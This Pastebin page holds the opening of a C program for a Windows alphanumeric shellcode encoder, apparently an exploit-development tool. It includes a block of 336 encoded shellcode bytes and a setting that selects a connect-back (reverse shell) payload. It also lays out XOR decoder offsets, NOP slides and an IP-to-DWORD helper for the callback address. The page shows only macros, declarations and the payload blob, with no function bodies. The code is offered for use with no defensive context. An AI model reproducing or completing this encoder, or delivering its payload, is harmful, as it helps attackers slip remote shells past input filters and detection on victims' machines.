Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <time.h>
- #include <stdio.h>
- #include <windows.h>
- #define MAX_BYTES 0x100
- #define MAX_ENCODED_SHELLCODE 2000 //this will be allocated on the stack
- #define MIN_IP_STR_LEN 7
- #define MAX_IP_STR_LEN 15
- #define OFFSET_XOR_AL1_A 15
- #define OFFSET_XOR_AL1_B 18
- #define OFFSET_XOR_AL2_A 37
- #define OFFSET_XOR_AL2_B 40
- #define OFFSET_PUSH_DWORD1 0
- #define OFFSET_PUSH_DWORD2 1
- #define OFFSET_PUSH_DWORD3 4
- #define OFFSET_PUSH_DWORD4 12
- #define OFFSET_RANDOMIZED_DECODER_HEAD 14
- #define SIZE_RANDOMIZED_DECODER_HEAD 16
- BYTE EncodedShellcode[] = // encoded 336 bytes
- "PZhUQPTX5UQPTHHH4D0B8RYkA9YA3A9A2B90B9BhPTRWX5PTRW4r8B9ugxPqy8xO"
- "wck4WTyhlLlUjyhukHqGCixVLt4UTCBRwsV3pRod8OLMKO9FXJVTJJbJX4gsVXAt"
- "Q3ukAxFmVIw7HyBfDyNv5zXqg4PQeTxZJLm56vRjSidjSz75mHb2RL5Hl30tUmnH"
- "HtXEv7oZVdiEv1QwWijcgVk4CZn7NI3uRai32AZ7FS0Iq1cwWc5T5RlnTIiKJVmq"
- "4T4MElucobfP4vWyB0OfB34JRJ9T4zjLlbKmlk7jTicj11869F001uAdTZKNJ7wL"
- "mOv5mLlGPKFLtNI2525WhktKDO0NIlseHIuJ33xv7xGQAW55eZKXHw78zfvCI2U0"
- "9Ulw5ZZhynmxG7JZZgJAYbg1MEp5QcOv7AYkYfcHQDWVMlJnzOSh8nzg1NZZn5Px"
- "11U5INVEtvZOS1E094HqmbB6K1MfRIq7KQyNOeL7NHI1Xnwhyhy69bg2bTexGnkc"
- "CEt90vn3DaFxGaFuRIPg0NK40kdg0L9ImaFbGy1Wl7JyGeJByHdfRCSYzvCzVa2v"
- "RtQWG5lxRMN1CZREvyKFvfwij3X2P81J1wk9ZLmGAqxGPuQv7RBX411iaWKCLGnD"
- "kwRZKREaRis5V7c5ILxKfAx6MbH40T53PnX9ZwSWtYzbHwCzkS0Ev5iVmLmS3xSk"
- "1telLPYuGyNvX1TyJ3yLdOwckr";
- // example: make encoder choose more uppercase bytes...
- #define ADDITIONAL_CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
- #define ALNUM_CHARSET ADDITIONAL_CHARSET "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" // <--- allowed charset
- // feel free to
- //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////change - YMMV
- #define REGISTER_WITH_ADDRESS_OF_SHELLCODE esp // <--- change this to the register holding the address of the decoder////////////
- #define _Q(str) #str
- #define Q(str) _Q(str)
- #define P(str) #str ##" // <--- buffer offset\n"## _Q(str)
- ///////////////////////////////////
- #define CONNECT_BACK_SHELLCODE //
- //#undef CONNECT_BACK_SHELLCODE //undefine CONNECT_BACK_SHELLCODE to use your own - and place it in shellcode[] >-----------------.
- /////////////////////////////////////////////////////////////////// |
- int main(); // |
- UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length); // |
- UCHAR get_push_register_instruction(UCHAR *reg); // |
- UCHAR get_random_alnum_value(); // |
- UCHAR get_random_alnum_push_dword_opcode(); // |
- UCHAR *get_nop_slide(UINT size, UINT slide); /////// |
- UCHAR *slide_substr_forward(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide);// |
- UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide); // |
- UCHAR *shuffle(UCHAR str[], UINT length); /////// |
- DWORD my_htonl(DWORD dw_in); // |
- DWORD ip_str_to_dw(UCHAR *str); // |
- BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key); // |
- BOOL is_alnum(UCHAR c); // |
- BOOL str_is_alnum(UCHAR *str); // |
- UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index); // |
- UCHAR *randomize_decoder_head(UCHAR *decoder, UINT size_decoder, UCHAR xor_al1, UCHAR jne_xor1); // |
- struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c); // |
- struct xor2_key *choose_random_node(struct xor2_key *head); // |
- void free_p_xor2_key(struct xor2_key *node); // |
- // |
- struct xor2_key { // |
- UCHAR xor2; // |
- UCHAR key; // |
- struct xor2_key *prev; // |
- struct xor2_key *next; // |
- } xor2_key;
Advertisement
Add Comment
Please, Sign In to add comment
